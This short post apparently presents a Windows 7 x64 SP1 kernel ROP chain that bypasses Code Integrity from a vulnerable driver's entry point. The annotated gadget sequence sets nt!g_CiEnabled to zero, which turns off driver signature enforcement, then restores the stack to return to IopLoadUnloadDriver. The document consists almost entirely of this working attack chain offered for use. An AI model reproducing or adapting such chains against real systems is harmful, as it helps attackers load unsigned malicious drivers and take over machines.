ROP for Windows 7 x64 to bypass Code Integrity from vulnerable DriverEntry
August 18, 2014
RET instructions are omitted
;;
;; NT Kernel ROP chain to bypass Code Integrity on Windows 7 x64 SP1 from IopLoadDriver
;;
;; ntoskrnl.exe
;; 6.1.7601.18409
;;
pop rax                 ; rsp + 10  ; skip, this gets replaced
pop rax                 ; rsp + 20  ; nt!g_CiEnabled
mov byte ptr [rax], 0   ; rsp + 28  ; nt!g_CiEnabled = 0
pop rax                 ; rsp + 38  ; align stack
pop rax                 ; rsp + 48  ; align stack
xor eax, eax            ; rsp + 50  ; STATUS_SUCCESS
add rsp, 240h           ; rsp + 290 ; epilogue
pop r15
pop r14
pop r13
pop r12
pop rdi
pop rsi
pop rbp
retn                    ; return to IopLoadUnloadDriver